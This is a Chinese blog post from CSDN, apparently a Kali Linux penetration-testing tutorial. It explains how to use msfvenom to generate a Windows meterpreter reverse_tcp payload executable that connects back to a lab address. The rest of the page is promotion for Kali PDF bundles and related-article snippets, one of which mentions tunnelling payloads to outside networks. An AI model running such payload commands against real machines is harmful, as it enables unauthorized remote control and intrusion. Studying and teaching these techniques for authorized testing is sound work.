Kali Linux 网络渗透测试实践指南:如何在Kali Linux中生成被控端

已于 2024-01-05 22:07:56 修改
阅读量227 收藏
点赞数
分类专栏: 网络安全 文章标签: linux 网络 web安全
于 2023-04-11 11:41:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_71744044/article/details/130079946
版权

本文讲解采用的Kali版本为2017.1版及其附带软件,版本不同仅做参照

被控端就是要运行在目标计算机上的,这个程序的功能听起来和木马很像,实际上也是如此。另外实际上要在渗透漏洞代码中替换的Shellcode部分就是这个远程控制程序的被控端的代码。现在先来学习一下如何生成被控端(这个被控端既可以是一段代码,也可以是一个直接执行的程序)。

在Kali Linux中提供了多个可以用来产生远程控制被控端程序的方式,但是其中最为简单强大的方法应该要数Msfvenom命令了。这个命令是著名渗透测试软件Metasploit的一个功能,但是可以直接在Kali Linux中使用这个命令。

以前旧版本的Metasploit中提供了两条关于远程控制被控端程序的命令,其中msfpayload负责用来生成攻击载荷,msfencode负责对攻击载荷进行编码。新版本的Metasploit中将这两条命令整合成为了msfvenom命令,下面给出了msfvenom的几个常见的使用参数。

Options:

-p, --payload 指定要生成的payload(攻击荷载)。如果需要使用自定义的payload,请使用’-'或者stdin指定

-f, --format 指定输出格式 (可以使用 --help-formats 来获取msf支持的输出格式列表)

-o, --out 指定存储payload的位置

–payload-options 列举payload的标准选项

–help-formats 查看msf支持的输出格式列表

这里面的参数很多,但是实际使用起来很简单,例如如果只是希望生成一个简单的被控端程序,那么只需要使用参数-p、-f和-o即可,分别指定要使用的被控端程序、要应用的平台(这里以windows为例)、保存的位置。

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp
lhost=192.168.169.130 lport=5000 -f exe -o /root/payload.exe

这里面使用最简单的msfvenom命令来生成一个被控端程序,使用的被控端程序就是一个用于Windows平台下的反向远程控制程序:windows/meterpreter/reverse_tcp,它的参数lhost的值为192.168.169.130(这个地址也就是所使用的Kali Linux虚拟机的IP地址)。

最后

这里给大家分享一份Kali Linux 系统资料包:戳这里👉《12份Kali Linux渗透测试PDF资料》免费领取!

1.目录

基于Android设备的Kali Linux渗透测试教程1
基于Android设备的Kali Linux渗透测试教程2
Web渗透测试使用kali linux
kali-linux中文指南
kali-linux-wireless-pentest
kali-linux-network-scanning-cookbook
kali-linux-cookbook
Kali 基本命令大全
Kali Linux渗透测试技术详解
Kali Linux 安全渗透教程
Kali Linux 高级渗透测试
Kali Linux渗透测试的艺术

戳这里👉《12份Kali Linux渗透测试PDF资料》免费领取!

img

2.Kali Linux 渗透测试技术详解

Linux安全渗透简介
配置Kali Linux
高级测试实验室
信息收集
漏洞扫描
漏洞利用
权限提升
密码攻击
无线网络渗透测试

3.Kali 基本命令大全

系统信息
文件和目录
文件搜索
挂载一个文件系统
磁盘空间
用户和群组
打包和压缩文件
查看文件内容
文本处理

img

4.Kali Linux 高级渗透测试

基于目标的渗透测试
开源情报和被动侦察
外网和内网的主动侦察
漏洞评估
物理安全和社会工程学

img

5.Kali Linux 中文指南

Kali Linux介绍
Kali Linux安装
Kali Linux一般应用
Kali Linux ARM应用
Kali Linux开发

6.Kali Linux 菜单栏各工具的使用

仅展示部分内容▼

img

更多网络安全学习资源可扫描下方卡片,免费分享!

无情哈老少
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Kali Linux 高级渗透测试(原书第2版)(带详细目录)
06-18
KaliLinux面向专业的渗透测试安全审计,集成了大量精心...本书在KaliLinux平台上从一个攻击者的角度来审视网络框架,详细介绍了攻击者“杀链”采取的具体步骤。通过阅读本书读者能快速学习并掌握渗透测试方法和工具。
Kali Linux渗透测试英文原版合集5【共23本,22本PDF带书签】part5
08-21
Advanced Penetration Testing For Highly-Secured Environments -2012.pdf BackTrack 5 Wireless Penetration Testing Beginners Guide.pdf Basic Security Testing with Kali Linux (2014).PDF Gray Hat Hacking 2nd Edition.pdf Hacking - Firewalls And Networks How To Hack Into Remote Computers.pdf Hacking The Art Of Exploitation(2nd Edition)-2008.pdf Hacking Wireless Networks For Dummies -2005.pdf Web Penetration Testing with Kali Linux -2013.pdf Hacking with Kali - Practical Penetration Testing Techniques 2014.pdf Instant Kali Linux -2013.pdf Kali Linux Cookbook -2013.pdf Kali Linux Social Engineering -2013.pdf Kali Linux:Assuring Security By Penetration Testing -2014.pdf Learning.Nessus.for.Penetration.Testing.Jan.2014.pdf Metasploit The Penetration Testers Guide- 2011.pdf Metasploit.Penetration.Testing.Cookbook.Jun.2012.pdf Offensive Security - Penetration Testing with BackTrack.pdf The Basics of Hacking and Penetration Testing.pdf 字数限制,还有5本书名字没写出.....,物超所值! 本资料共包含以下附件: Kali Linux.part01.rar Kali Linux.part02.rar Kali Linux.part03.rar Kali Linux.part04.rar Kali Linux.part05.rar Kali Linux.part06.rar
Kali Linux Windows渗透教程从0到解决思路。
sunwanfulove的博客
09-22 2216
Kali Linux Windows渗透教程从0到解决思路成为安全工程师必备技能。
Kali Linux 渗透测试全流程详解
最新发布
Spontaneous_0的博客
10-25 1221
在当前互联网环境下,企业与黑产的对抗必将是长期的过程。企业要想保护好自己的业务与数据,就要做到攻防兼备,不能仅寄希望于现有的安防措施就觉得高枕无忧了,一定要重视系统渗透测试工作,主动发现潜在风险,排除隐患。《Kali Linux 渗透测试全流程详解》可以作为企业实施渗透测试指南,它最主要的特点就是围绕渗透测试的全流程展开,以具体的实例展示了信息收集、漏洞扫描、漏洞利用、提权、持久化、横向渗透的各个过程。这样有助于读者形成系统的渗透测试方法论,能够将多种工具组合起来攻击目标。
Kali Linux】高级渗透测试实战篇
小洁洁
09-01 5089
>对于企业网络安全建设工作的质量保障,业界普遍遵循PDCA(计划(Plan)、实施(Do)、检查(Check)、处理(Act))的方法论。近年来,网络安全攻防对抗演练发挥了越来越重要的作用。企业的安全管理者通过组织内部或外部攻击队,站在恶意攻击者的视角,识别自身网络安全建设过程的防护短板,检验安全应急预案的有效性并持续优化,为业务发展提供更强的保驾护航能力。
利用Kali 完成一次简单的渗透
qq_50905066的博客
03-20 3万+
这里我们需要两台虚拟机。一台Kali 作为攻击机,一台Ubuntu作为靶机。 如图: 渗透的话我们需要先得到靶机的ip 地址才能进行扫描。因为是虚拟机,只要我们知道了Kali 的ip 的地址,扫描其所在网段就可以获得靶机的地址了。 如图: 通过使用Kali自带的扫描工具执行Namp -sP 192.168.161.1/24就可以扫到了。这里我们排出太小的地址和太大的地址以及攻击的地址就可以确定靶机的地址了。 在得到靶机的地址之后,我们就可以进一步扫描靶机口,从其获得靶机开启的口和..
Kali Linux渗透测试高级篇.rar
09-12
Kali Linux 是一款专门用于IT...目前作为被欢迎的Linux操作系统广泛用于安全评估项目,其提供600+安全工具,帮助安全人员更好的完成项目。课程主要内容:学习Kali Linux安全测试使用工具的使用,以及高级技巧的使用
kali linux安全渗透教程_网络攻防_安全测试_KaliLinux安全渗透_
10-02
详细介绍如何使用kali linux进行网络攻防,渗透测试
基于Kali Linux渗透测试.pdf
09-06
渗透测试的方法有很多,在行业内被广泛采纳的有:ISSAF(信息系统安全评估架构)、NIST800-115(信息安全测试与评估技术指南)、OWASP(开放式 WEB 应用安全)、PTES(渗透测试执行标准)、OSSTMM(开源安全测试方法...
渗透测试kali使用教程(一):常用命令和基本工具使用
热门推荐
u011871680的博客
12-03 4万+
kali教程
Kali Linux渗透测试英文原版合集【共23本,22本PDF带书签】part1
08-12
Advanced Penetration Testing For Highly-Secured Environments -2012.pdf BackTrack 5 Wireless Penetration Testing Beginners Guide.pdf Basic Security Testing with Kali Linux (2014).PDF Gray Hat Hacking 2nd Edition.pdf Hacking - Firewalls And Networks How To Hack Into Remote Computers.pdf Hacking The Art Of Exploitation(2nd Edition)-2008.pdf Hacking Wireless Networks For Dummies -2005.pdf Web Penetration Testing with Kali Linux -2013.pdf Hacking with Kali - Practical Penetration Testing Techniques 2014.pdf Instant Kali Linux -2013.pdf Kali Linux Cookbook -2013.pdf Kali Linux Social Engineering -2013.pdf Kali Linux:Assuring Security By Penetration Testing -2014.pdf Learning.Nessus.for.Penetration.Testing.Jan.2014.pdf Metasploit The Penetration Testers Guide- 2011.pdf Metasploit.Penetration.Testing.Cookbook.Jun.2012.pdf Offensive Security - Penetration Testing with BackTrack.pdf The Basics of Hacking and Penetration Testing.pdf 字数限制,还有5本书名字没写出.....,物超所值!
如何使用kali来入侵(渗透)一台windows
qq_46406833的博客
05-17 2万+
此文章为网络安全爱好者小白设计的,所以木马没做免杀,渗透前请把防火墙和杀毒软件关闭
kali】metasploit渗透测试工具使用教程
Kris__zhang的博客
06-23 8576
metasploit概述 是一款开源的安全漏洞检测工具,它可以帮助网络安全和IT专业人士识别安全性问题,验证漏洞的解决措施,从而完成对目标的安全性评估 该工具包括了 智能开发,代码审计,web应用程序扫描和社会工程等各项功能 什么是metasploit 可以用来发现漏洞,利用漏洞,提交漏洞,并实施攻击,用户可以从其他 漏洞扫描程序导入数据,基于漏洞主机的详细信息来发现可攻击漏洞 模块按照不同用途可分为7类型,分别是Exploits(渗透攻击模块),Auxiliary(辅助模块),Post(后渗透攻击模块
kali渗透之从0到root的操作系统渗透全过程
m0_56988395的博客
12-02 2347
目录 攻击机 靶机 扫目录 根据提示进行fuzz:模糊测试 尝试wordpress 接下进行注入,在主题编辑器里进行写入木马 提权 注:以下内容仅供学习,请勿用于非法途径 攻击机 kali 靶机 prime1 链接: https://pan.baidu.com/s/1DEXUTVoRNhaYw_CqNzEqow?pwd=4bm5 提取码: 4bm5 或者直接去vulnhub.com下载,里面有各类镜像 首先进入靶机 发现什么都没有 扫目录 dir.
kali linux安全渗透教程
ITSM/ITIL/网络安全/IT运维
07-08 3937
第1章 Linux安全渗透简介 渗透测试是对用户信息安全措施积极评估的过程。通过系统化的操作和分析,积极发现系统和网络存在的各种缺陷和弱点,如设计缺陷和技术缺陷。本章将简要介绍Linux安全渗透及安全渗透工具的相关内容。其主要知识点如下: 什么是安全渗透; 安全渗透所需的工具; Kali Linux简介; 安装Kali LinuxKali更新与升级; 基本设置。 1.1 什么是安全渗透 渗透测试并没有一个标准的定义。国外一些安全组织达成共识的通用说法是,渗透测试是通过模拟恶意黑客的攻击
kalilinux渗透流程(一)
qq_59950255的博客
03-10 8571
OSINT:指通过公共资源,进行信息的收集,通常分为主动攻击类(比如,口信息,内网结构,等),被动防御类(比如常见的安全漏洞,代码规范等) 被动侦察:指不与渗透目标发生直接接触,通过OSINT收集信息 whois域名查询(顺道复习域名分类,.com,.cn等为顶级域名,xx.com为二级域名,xxx.xxx.com为三级域名) 输入whois + 查询域名进行查询 也同通过此连接,访问查询的web界面 通过输入网址,并在控制器网络里查看 可以看出发包情况 可以看出po..
kali渗透内网和外网
weixin_62693307的博客
04-17 5930
set payload windows/meterpreter/reverse_tcp 设置payload为刚才反向远程控制程序名称(windows/meterpreter/reverse_tcp)接着我们要在Sunny-Ngrok注册登陆,这里要买个隧道,但是免费的,就是认证要花2元,这个隧道是帮助我们做内网穿透的,但这个免费的隧道服务器在美国那边,所以有的时候可能不太好用。这里设置的IP和侦听的口后生成外网木马程序时的IP和口时不一样的,因为我们这是内网入侵外网。
【干货】Kali Linux渗透基础知识大全,零基础入门必看!
hack0919的博客
06-08 2570
有人觉得黑客霸气外漏,动动手指就能控制外界的一切。也有人觉得黑客是专门窃取别人信息的,不干啥好事。先不管黑客这个职业好不好,我们了解黑客,除了觉得很cool,还可以防止自己的信息被泄露。今天我们就来跟大家分享一下简单又好操作的渗透神器——kali linux
实践学习kali linux渗透测试
04-10
可以通过Kali Linux进行渗透测试,但需要充分理解计算机网络安全知识,并具备合法和良好的行为准则。在学习Kali Linux渗透测试之前,应该先熟悉基础的Linux操作系统知识。同时,需要遵守国家法律法规和道德规范,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值